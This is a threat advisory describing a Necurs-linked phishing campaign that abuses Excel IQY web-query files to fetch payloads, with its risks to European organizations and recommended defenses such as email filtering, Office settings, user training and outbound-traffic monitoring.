This threat involves a phishing campaign that abuses Microsoft Excel Internet Query Files (IQY files) to deliver malicious payloads. IQY files are legitimate Excel files that contain web query instructions, allowing Excel to fetch data from external web sources. Attackers exploit this feature by crafting malicious IQY files that, when opened by a victim, cause Excel to automatically retrieve and execute data or scripts from attacker-controlled servers. This technique is used as a payload delivery mechanism within phishing emails, often leveraging social engineering to convince users to open the malicious Excel attachments. The campaign is associated with the Necurs botnet, a well-known malware distribution network, indicating a potentially large-scale and automated phishing operation. Although no specific software vulnerabilities are exploited, the attack leverages user trust and Excel’s functionality to bypass traditional security controls. The campaign does not require prior authentication but depends on user interaction to open the malicious Excel file. No patches are available since this is an abuse of legitimate functionality rather than a software flaw. The campaign was first reported in mid-2018 and is categorized as medium severity due to the potential for credential theft, malware delivery, or further network compromise through social engineering and payload execution.

For European organizations, this phishing technique poses significant risks primarily through social engineering and subsequent malware infection or credential compromise. The automatic data retrieval feature in Excel IQY files can be abused to download malicious scripts or payloads, potentially leading to unauthorized access, data exfiltration, or lateral movement within corporate networks. Organizations with a high reliance on Microsoft Office products and Excel for data analysis and reporting are particularly vulnerable. The campaign’s association with the Necurs botnet suggests potential for widespread distribution, increasing the likelihood of targeted attacks against European enterprises. The impact includes potential disruption of business operations, financial loss due to fraud or ransomware, and reputational damage. Since the attack vector involves user interaction, organizations with insufficient user awareness training or weak email filtering controls are at higher risk. Additionally, sectors with sensitive data such as finance, healthcare, and government institutions in Europe could face elevated threats due to the value of their information and strategic importance.

To mitigate this threat effectively, European organizations should implement a multi-layered defense strategy beyond generic advice: 1) Enhance email filtering to detect and quarantine emails containing IQY files or suspicious Excel attachments, using advanced heuristics and sandboxing to analyze attachment behavior. 2) Configure Microsoft Office security settings to disable or restrict automatic external data connections in Excel, preventing IQY files from fetching data without explicit user consent. 3) Conduct targeted user awareness training focusing on the risks of opening unsolicited Excel attachments and recognizing phishing attempts that use legitimate file types for malicious purposes. 4) Employ endpoint detection and response (EDR) solutions capable of identifying unusual Excel network activity or script execution triggered by IQY files. 5) Maintain strict network segmentation and monitor outbound traffic for unusual connections to unknown external servers, which may indicate IQY file exploitation. 6) Implement application whitelisting to restrict execution of unauthorized scripts or macros initiated by Excel. 7) Regularly update threat intelligence feeds and integrate indicators of compromise related to Necurs and similar campaigns into security monitoring tools. These targeted controls will reduce the attack surface and improve detection and response capabilities against this specific phishing vector.